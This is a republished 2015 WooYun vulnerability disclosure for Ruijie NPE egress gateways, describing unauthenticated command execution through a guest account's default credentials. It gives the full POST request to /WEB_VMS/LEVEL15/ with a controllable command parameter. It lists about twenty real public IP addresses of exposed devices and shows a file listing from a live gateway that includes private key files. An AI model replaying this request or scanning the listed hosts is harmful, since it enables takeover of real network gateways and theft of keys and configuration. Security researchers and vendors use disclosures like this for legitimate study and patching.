锐捷NPE出口网关任意操作的命令执行
漏洞概要
缺陷编号:
WooYun-2015-123851
漏洞标题: 锐捷NPE出口网关任意操作的命令执行
相关厂商:
ruijie.com.cn
漏洞作者:
路人甲
提交时间: 2015-07-01 10:39
公开时间: 2015-09-29 17:52
漏洞类型: 非授权访问
危害等级: 高
自评Rank: 15
漏洞状态: 厂商已经确认
漏洞来源:
http://www.wooyun.org
Tags标签:
设计缺陷/边界绕过
漏洞详情披露状态:
2015-07-01: 细节已通知厂商并且等待厂商处理中
2015-07-01: 厂商已经确认,细节仅向厂商公开
2015-07-04: 细节向第三方安全合作伙伴开放(绿盟科技、唐朝安全巡航)
2015-08-25: 细节向核心白帽子及相关领域专家公开
2015-09-04: 细节向普通白帽子公开
2015-09-14: 细节向实习白帽子公开
2015-09-29: 细节向公众公开
简要描述:
锐捷NPE出口网关任意操作的命令执行
详细说明:
厂商:锐捷网络
产品名称:NPE网络出口引擎
官网:http://www.ruijie.com.cn/
关键字:title:锐捷网络 --NPE网络出口引擎--登录界面
列举了部分:
http://223.220.248.3/index.htm
http://221.213.54.66/index.htm
http://219.139.148.126/index.htm
http://60.19.64.146/index.htm
http://125.67.7.2/index.htm
http://202.103.10.214/index.htm
http://58.18.131.200/index.htm
http://175.174.62.25/index.htm
http://58.254.92.130/index.htm
http://58.18.163.190/index.htm
http://117.132.9.226/index.htm
http://119.255.22.13/index.htm
http://211.154.11.246/index.htm
http://221.203.77.234/index.htm
http://120.209.15.197:8888/index.htm
http://61.131.82.228:8080/index.htm
http://221.202.167.17:8080/index.htm
http://202.115.254.26/index.htm
http://1.30.21.42/index.htm
http://218.65.220.99:9090/index.htm
系统自身存在的用户有:admin、manager、guest。guest的默认账号是guest,
一个正常的guest用户登陆后的cookie是这样的:
Cookie: auth=Z3Vlc3Q6Z3Vlc3Q%3D; user=guest; c_name=; hardtype=NPE60E; web-coding=gb2312; currentURL=1.1
之前出现越权登陆之后,锐捷将guest的账户页面仅可查看当前状态,前台是无法进行任何操作的。但是问题是,前台的可视化显示是通过直接调用命令进行展示,调用命令的时候,是没有进行任何的权限认证的,从而导致了任意代码执行。
这里以http://221.213.54.66/index.htm为例:
前台会调用各种系统命令,如端口状态、CPU状态等等
这里以其中的一条后台请求为例:
code 区域POST /WEB_VMS/LEVEL15/ HTTP/1.1
Accept: */*
Authorization: Basic Z3Vlc3Q6Z3Vlc3Q=
Referer: http://221.213.54.66/cache.htm
Accept-Language: zh-cn
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Host: 221.213.54.66
Content-Length: 73
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: auth=Z3Vlc3Q6Z3Vlc3Q%3D; user=guest; c_name=; hardtype=NPE60E; web-coding=gb2312; currentURL=1.1
command=show%20clock&strurl=exec%04&mode=%02PRIV_EXEC&signname=Red-Giant.
其中command可控,直接执行各种敏感命令均可!
如查看版本信息:
配置信息:
控制台用户密码:
当然也可以重启、恢复出厂默认、更改各项配置等等。
不仅如此,还可以获取系统任意信息及文件。
如:获取系统文件:
code 区域Mode Link Size MTime Name<OPTION>
-------- ---- --------- ------------------- ------------------<OPTION>
<DIR> 1 0 1970-01-01 08:00:00 dev/<OPTION>
<DIR> 2 0 2011-07-20 22:53:09 mnt/<OPTION>
<DIR> 1 0 2015-06-09 08:46:13 ram/<OPTION>
<DIR> 2 0 2015-01-07 00:11:07 tmp/<OPTION>
<DIR> 0 0 1970-01-01 08:00:00 proc/<OPTION>
1 239730 1970-01-01 08:02:49 ucs_gb.db <OPTION>
1 915556 2012-07-26 08:31:33 signature.db <OPTION>
1 34 2015-06-12 08:34:30 update_list.txt <OPTION>
1 410 2012-07-26 08:32:49 file_list.txt <OPTION>
1 13652864 2014-09-02 17:47:14 rgos4b8R144358.bin <OPTION>
1 2255101 1970-01-01 08:02:52 lb-route-choose.db <OPTION>
1 424 2011-10-11 22:52:59 rsa_private.bin <OPTION>
<DIR> 4 0 2012-12-11 08:17:47 pkistore/<OPTION>
1 696 2015-01-06 22:56:47 httpd_cert.crt <OPTION>
1 25769 1970-01-01 08:02:52 fc_template.txt <OPTION>
1 2200856 2015-06-04 08:35:08 app_sub_1.db <OPTION>
1 124840 2015-06-04 08:35:14 app_sub_2.db <OPTION>
1 688 2015-06-04 08:35:14 app_sub_3.db <OPTION>
1 30023 2014-09-02 16:46:04 config20140902.text <OPTION>
1 8891 2015-01-08 09:15:29 signature_content.db <OPTION>
1 887 2015-01-06 22:56:47 httpd_key.pem <OPTION>
1 14667776 1970-01-01 08:02:24 rgos.bin <OPTION>
1 82 2014-05-05 17:20:57 tcp_close_trace.text <OPTION>
1 150740 1970-01-01 08:02:48 ucs_big5.db <OPTION>
1 4936 2015-05-04 16:04:57 config.text <OPTION>
1 5273 2015-01-08 09:15:29 feedback.txt <OPTION>
1 56882 2015-04-18 08:34:40 route-choose.db <OPTION>
<DIR> 5 0 2008-08-09 11:23:24 portal/<OPTION>
1 424 2011-10-11 22:52:59 rsa1_private.bin <OPTION>
<DIR> 2 0 2015-06-12 08:50:24 feedback/<OPTION>
<DIR> 2 0 2015-06-04 08:35:05 app_tmp/<OPTION>
1 14667776 1970-01-01 08:01:59 rgos.bin.bak <OPTION>
1 8978272 2015-01-10 08:39:54 web_management_pack.upd <OPTION>
1 390 2015-06-04 08:35:04 app_file_list.txt <OPTION>
<DIR> 2 0 2012-12-11 11:29:56 user_auth/<OPTION>
1 42496 1970-01-01 08:00:32 portal_pack.upd <OPTION>
1 3275 2011-10-01 23:47:17 config.text.ord <OPTION>
<DIR> 2 0 2015-06-10 08:34:23 http_update/<OPTION>
--------------------------------------------------------------<OPTION>
27 Files (Total size 58035091 Bytes), 11 Directories.<OPTION>
Total 535822336 bytes (511MB) in this device, 448499712 bytes (427MB) available.<OPTION>
漏洞证明:
如上!
修复方案:
如上!
版权声明:转载请注明来源
路人甲@
乌云
漏洞回应
厂商回应:
危害等级:低
漏洞Rank:1
确认时间:2015-07-01 17:50
厂商回复:修复方案:
设备软件版本升级到最新版即可
最新状态:2015-07-02:已经在官网,提供解决漏洞的新版本供下载。 并且每次发布新版本后,设备上的web都会有一次提示更新,请根据提示升级。
原文:http://www.wooyun.org/bugs/wooyun-2015-0123851
搜索更多相关主题的帖子:
锐捷 NPE 非授权访问 远程命令执行 锐捷 NPE 非授权访问 远程命令执行